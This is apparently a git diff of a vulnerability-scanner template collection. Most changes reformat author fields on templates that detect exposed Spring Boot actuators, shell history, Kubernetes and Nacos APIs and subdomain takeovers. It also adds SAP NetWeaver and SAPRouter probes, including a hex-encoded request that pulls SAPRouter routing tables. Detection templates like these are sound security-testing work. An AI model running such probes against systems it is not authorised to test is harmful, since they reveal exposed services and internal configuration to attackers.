- "([^]|[']|[ ]|[:]|http)*(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
- "([^]|[']|[ ]|[:]|http)*(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"

View File

@ -2,7 +2,7 @@ id: front-page-misconfig
info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications

View File

@ -2,7 +2,7 @@ id: java-melody-exposed
info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK & thomas_from_offensity
author: dhiyaneshDK,thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session.
reference: |

View File

@ -2,7 +2,7 @@ id: kubernetes-pods-api
info:
name: Kubernetes Pods API
author: ilovebinbash & geeknik & 0xtavian
author: ilovebinbash,geeknik,0xtavian
severity: critical
description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/

View File

@ -0,0 +1,25 @@
id: sap-netweaver-info-leak
info:
name: SAP NetWeaver ICM Info page leak
author: randomstr1ng
description: Detection of SAP NetWeaver ABAP Webserver /public/info page
severity: medium
tags: sap,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/sap/public/info"
matchers:
- type: regex
part: body
regex:
- "RFC_SYSTEM_INFO.Response"
extractors:
- type: regex
part: body
regex:
- "<RFCDEST>.*</RFCDEST>"

View File

@ -2,7 +2,7 @@ id: server-status-localhost
info:
name: Server Status Disclosure
author: pdteam & geeknik
author: pdteam,geeknik
severity: low
tags: apache,debug

View File

@ -2,7 +2,7 @@ id: shell-history
info:
name: Shell History
author: pentest_swissky & geeknik
author: pentest_swissky,geeknik
severity: low
description: Discover history for bash, ksh, sh, and zsh
tags: config

View File

@ -2,7 +2,7 @@ id: springboot-configprops
info:
name: Detect Springboot Configprops Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-heapdump
info:
name: Detect Springboot Heapdump Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-httptrace
info:
name: Detect Springboot httptrace
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-loggers
info:
name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-mappings
info:
name: Detect Springboot Mappings Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Additional routes may be displayed
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-trace
info:
name: Detect Springboot Trace Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: unauthenticated-nacos-access
info:
name: Unauthenticated Nacos access v1.x
author: taielab & @pikpikcu
author: taielab,pikpikcu
severity: critical
issues: https://github.com/alibaba/nacos/issues/4593
tags: nacos,unauth

View File

@ -0,0 +1,24 @@
id: sap-router-info-leak
info:
name: SAPRouter - Routing information leak
author: randomstr1ng
severity: critical
tags: network,sap
network:
- inputs:
- data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:3299"
read-size: 2048
matchers:
- type: word
words:
- "Routtab"
- "Working directory"
- "SAProuter Connection Table"

22
network/sap-router.yaml Normal file
View File

@ -0,0 +1,22 @@
id: sap-router
info:
name: SAPRouter Detection
author: randomstr1ng
severity: info
tags: network,sap
network:
- inputs:
- data: 57484f415245594f553f0a
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:3299"
read-size: 1024
matchers:
- type: word
words:
- "SAProuter"

View File

@ -2,7 +2,7 @@ id: unauth-ftp
info:
name: FTP Anonymous Login
author: Celesian ( @C3l3si4n )
author: C3l3si4n
severity: medium
reference: https://tools.ietf.org/html/rfc2577
tags: network,ftp

View File

@ -2,7 +2,7 @@ id: acquia-takeover
info:
name: Acquia Takeover Detection
author: pdcommunity
author: pdteam
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: aftership-takeover
info:
name: Aftership Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: agilecrm-takeover
info:
name: agilecrm takeover detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: aha-takeover
info:
name: Aha Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: airee-takeover
info:
name: Airee Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: anima-takeover
info:
name: Anima Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: aws-bucket-takeover
info:
name: AWS Bucket Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover,aws
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: bigcartel-takeover
info:
name: Bigcartel Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: bitbucket-takeover
info:
name: Bitbucket Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: brightcove-takeover
info:
name: brightcove takeover detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

Some files were not shown because too many files have changed in this diff Show More